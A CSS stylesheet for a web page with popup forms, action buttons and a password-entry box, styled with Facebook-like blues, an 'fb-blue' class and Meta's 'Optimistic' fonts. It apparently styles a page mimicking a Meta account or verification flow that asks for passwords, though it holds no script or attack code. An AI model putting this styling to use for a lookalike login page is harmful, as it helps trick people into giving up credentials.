* {
    font-family: Arial, Helvetica, sans-serif !important;
}
*, :before, :after {
    box-sizing: border-box;
    border-width: 0;
    border-style: solid;
    border-color: currentColor;
}
body {
   
    margin: 0%;
    font-size: 1rem;
    font-weight: 400;
    color: #212529;
    background-color: #fff;
    -webkit-text-size-adjust: 100%;
    -webkit-tap-highlight-color: transparent;
}
#main-component {
    background: linear-gradient(130deg, rgba(249, 241, 249, 1) 0%, rgba(234, 243, 253, 1) 35%, rgba(237, 251, 242, 1) 100%);
 
    overflow-y: scroll;
   
  
}
body::-webkit-scrollbar {
    display: none; /* For clean, minimalist look */
}

/* Custom scrollbar style */
body::-webkit-scrollbar {
    width: 10px; /* Adjust width for vertical scrollbar */
    height: 10px; /* Adjust height for horizontal scrollbar */
}

body::-webkit-scrollbar-track {
    background: #f0f0f0; /* Track color */
    border-radius: 10px; /* Rounded corners for the track */
}

body::-webkit-scrollbar-thumb {
    background-color: #007bff; /* Scrollbar color */
    border-radius: 10px; /* Rounded corners for the scrollbar */
    border: 2px solid #f0f0f0; /* Space around the thumb */
}

body::-webkit-scrollbar-thumb:hover {
    background-color: #0056b3; /* Darker color on hover */
}
p {
    margin: 0;
    font-size: 15px;
    line-height: 20px;
    font-family: Optimistic Text Normal, Helvetica, Arial, sans-serif !important;
}
.left {
    border-right: 1px solid #DEE3E9;
    
}
.col-4 {
    flex: 0 0 auto;
    width: 33.33333333%;
}
.row>* {
    flex-shrink: 0;
    max-width: 100%;
    padding-right: calc(var(--bs-gutter-x)* .5);
    padding-left: calc(var(--bs-gutter-x)* .5);
    margin-top: var(--bs-gutter-y);
}
.left .left-content {
    height: 100vh;
    padding: 40px 20px 0 0;
    position: sticky;
    position: -webkit-sticky;
    top: 0;
    overflow-y: auto;
}
.logo {
    width: 70px;
}
.col-8 {
    flex: 0 0 auto;
    width: 66.66666667%;
}
.row>* {
    flex-shrink: 0;
    max-width: 100%;
    padding-right: calc(var(--bs-gutter-x)* .5);
    padding-left: calc(var(--bs-gutter-x)* .5);
    margin-top: var(--bs-gutter-y);
}
.content-right {
    padding: 40px 20px;
    height: 100vh;
    padding: 40px 20px 0 0;
    position: absolute;
   
    top: 0;
    overflow-y: auto;
    width: 60%;
    right: 0;

}
h1 {
    font-size: 24px;
    display: flex
;
    align-items: center;
}

h1 {
    line-height: 30px;
    color: #1c1e21;
    font-family: Optimistic Display Bold, Helvetica, Arial, sans-serif;
    font-weight: 700;
    margin: 16px 0;
}
p {
    margin: 0;
    font-size: 15px;
    line-height: 20px;
    font-family: Optimistic Text Normal, Helvetica, Arial, sans-serif !important;
}
img {
    max-width: 100%;
    height: auto;
}

img, svg {
    display: block;
    vertical-align: middle;
}
.card-thumb {
    display: flex
;
    flex-direction: column;
    border-radius: 20px;
    background-color: #fff;
    margin: 20px 0;
    overflow: hidden;
}
.button.fb-blue {
    background-color: #0064e0;
    color: #fff;
}
.btn-wrapper {
    width: 100%;
    display: flex
;
    justify-content: center;
    padding: 20px 0 0;
}
.button {
    width: 100%;
    height: 50px;
    border-radius: 20px;
    display: flex
;
    justify-content: center;
    align-items: center;
    cursor: pointer;
}
button, select {
    text-transform: none;
}
button, input, optgroup, select, textarea {
    font-family: inherit;
    font-size: inherit;
    line-height: inherit;
    margin: 0;
}
.button.fb-blue {
    background-color: #0064e0;
    color: #fff;
}
.thumb-content {
    margin: 20px;
}
.thumb-content h4 {
    font-weight: 500;
    margin: 14px 0;
}
h6 {
    font-size: 15px;
    font-weight: 600;
    margin-bottom: 20px;
}
.action-button-list .action-button.b-bottom {
    border-bottom: 1px solid #E3E8EF;
}
.action-button-list .action-button {
    border-radius: 0;
    background-color: #fff;
}
.action-button {
    display: flex
;
    align-items: center;
    width: 100%;
    padding: 12px 16px;
    border-radius: 15px;
    color: #000;
    background-color: inherit;
    transition: background-color .35s ease;
    cursor: pointer;
    font-size: 16px;
    font-weight: 500;
    line-height: 20px;
    font-family: Optimistic Text Medium, Helvetica, Arial, sans-serif;
}
.action-button .action-text {
    width: 100%;
    text-align: left;
    padding: 0 12px;
}
.action-button-list .action-icon img {
    width: 48px;
    height: 48px;
}
img {
    max-width: 100%;
    height: auto;
}
img, svg {
    display: block;
    vertical-align: middle;
}
img, svg {
    vertical-align: middle;
}
.action-button-list .action-button .action-arrow svg {
    transform: rotate(-90deg);
}
.action-button .action-arrow svg {
    width: 24px;
    height: 24px;
}
svg {
    display: inline-block;
}
img, svg {
    display: block;
    vertical-align: middle;
}
img, svg {
    vertical-align: middle;
}



.action-button.main {
    color: #fff;
    background-color: #344854;
}
.action-button {
    display: flex
;
    align-items: center;
    width: 100%;
    padding: 12px 16px;
    border-radius: 15px;
    color: #000;
    background-color: inherit;
    transition: background-color .35s ease;
    cursor: pointer;
    font-size: 16px;
    font-weight: 500;
    line-height: 20px;
    font-family: Optimistic Text Medium, Helvetica, Arial, sans-serif;
}
#main-component #main {
    max-width: 1100px;
}
@media (min-width: 1200px) {
    .container-sm {
        max-width: 1140px;
    }
}
@media (min-width: 992px) {
    .container-sm {
        max-width: 960px;
    }
}
@media (min-width: 768px) {
    .container-sm {
        max-width: 720px;
    }
}
@media (min-width: 576px) {
    .container-sm {
        max-width: 540px;
    }
}
.container-sm {
    width: 100%;
    padding-right: var(--bs-gutter-x, .75rem);
    padding-left: var(--bs-gutter-x, .75rem);
    margin-right: auto;
    margin-left: auto;
}
@media (min-width: 1200px) {
    .container, .container-lg, .container-md, .container-sm, .container-xl {
        max-width: 1140px;
    }
}
@media (min-width: 992px) {
    .container, .container-lg, .container-md, .container-sm {
        max-width: 960px;
    }
}
@media (min-width: 768px) {
    .container, .container-md, .container-sm {
        max-width: 720px;
    }
}
@media (min-width: 576px) {
    .container, .container-sm {
        max-width: 540px;
    }
}
.container, .container-fluid, .container-lg, .container-md, .container-sm, .container-xl, .container-xxl {
    --bs-gutter-x: 1.5rem;
    --bs-gutter-y: 0;
    margin-left: auto;
    margin-right: auto;
    padding-left: calc(var(--bs-gutter-x)* .5);
    padding-right: calc(var(--bs-gutter-x)* .5);
    width: 100%;
}
.content-right {
    padding: 40px 20px;
}
.logo svg {
    height: -moz-min-content;
    height: min-content;
    width: 100%;
}
.popup .popup-item.active {
    display: block;
}
.popup .popup-item {
    max-height: none;
    max-width: 500px;
    margin: 15px;
    width: 95%;
    border-radius: 25px;
    background: linear-gradient(90deg, rgba(249, 241, 249, 1) 0%, rgba(234, 243, 253, 1) 35%, rgba(237, 251, 242, 1) 100%);
    padding: 20px;
    overflow-y: auto;
    height: 100vh;
    display: none;
}
.form-item p {
    margin-top: 10px;
    font-size: 13px;
}
.form-item-detailtxt {
   
    color: rgba(144, 148, 156, 0.779);
}
.form-inputs label {
    margin-left: 3px;
    font-size: 13px;
    margin-top: 10px;
}
form label {
    margin-bottom: .5rem;
}
button:not(:disabled) {
    cursor: pointer;
}
.button-send {
    width: 100%;
    display: flex
;
    justify-content: center;
    align-items: center;
    position: relative;
    border-radius: 25px;
    padding: 8px;
    font-size: 20px;
    color: #fff;
    background-color: #0d6efd;
    border-color: #0d6efd;
    margin-top: 20px;
}
[type=submit] {
    -webkit-appearance: button;
    background-image: none;
}
.popup-footer {
    display: flex
;
    align-items: center;
    justify-content: center;
}
.popup.active {
    z-index: 9;
    display: flex;
}
.popup {
    display: none;
    position: fixed;
    padding: 0;
    top: 0;
    left: 0;
    bottom: 0;
    right: 0;
    width: 100%;
    height: 100%;
    background: rgba(0, 0, 0, .5);
    align-items: center;
;
    justify-content: center;
    flex-direction: column;
    z-index: -1;
}
.popup-head {
    display: flex
;
    align-items: center;
    justify-content: space-between;
    padding: .4rem 0;
}
.popup-head .close-bar svg {
    width: 20px;
    height: 20px;
}
svg {
    display: inline-block;
}
.form-inputs input {
    border: 2px solid #D4DBE3;
    outline: none;
    border-radius: 10px;
    padding: 5px;
}
.form-inputs input {
    padding: 8px !important;
    width: 100% !important;
}
body::-webkit-scrollbar {
    display: none; /* For clean, minimalist look */
}



.form-item video {
    width: 70% !important;
}
.popup-head .close-bar {
    padding: .2rem;
    border-radius: 25px;
}
.close-bar {
    display: flex
;
    flex-direction: column;
    cursor: pointer;
    align-items: end;
}
.passwordContainer {
    display: flex
;
    flex-direction: column;
    margin-top: 20px;
}
.passwordContainer {
    display: block;
    margin: 30px auto auto;
    width: 30%;
}
.passwordContainer img {
    display: block;
    height: 100px;
    margin: auto;
    width: 100px;
}
img, svg {
    vertical-align: middle;
}
.passwordContainer h3 {
    margin-top: 30px;
}
@media (min-width: 1200px) {
    .h3, h3 {
        font-size: 1.75rem;
    }
}
.passwordContainer p {
    color: #989797;
}
.passwordContainer input {
    border: 1px solid #d3d3d3;
    border-radius: 5px;
    margin-top: 10px;
    outline: none;
    padding: 14px;
    width: 350px;
}
button, input, optgroup, select, textarea {
    font-family: inherit;
    font-size: inherit;
    line-height: inherit;
    margin: 0;
}
[type=button]:not(:disabled), [type=reset]:not(:disabled), [type=submit]:not(:disabled), button:not(:disabled) {
    cursor: pointer;
}
.passwordContainer button {
    background-color: #1778f2;
    border: none;
    border-radius: 5px;
    color: #fff;
    cursor: pointer;
    width: 350px;
    display: block;
    font-weight: 700;
    margin-top: 20px;
    padding: 10px;
}
.bg-pass{
    background-color: #98979726;
}
@media (max-width: 700px) {
    .col-4 {
        display: none;
    }
    .content-right{
        display: block;
        margin: auto;
        width: 95%;
    }
}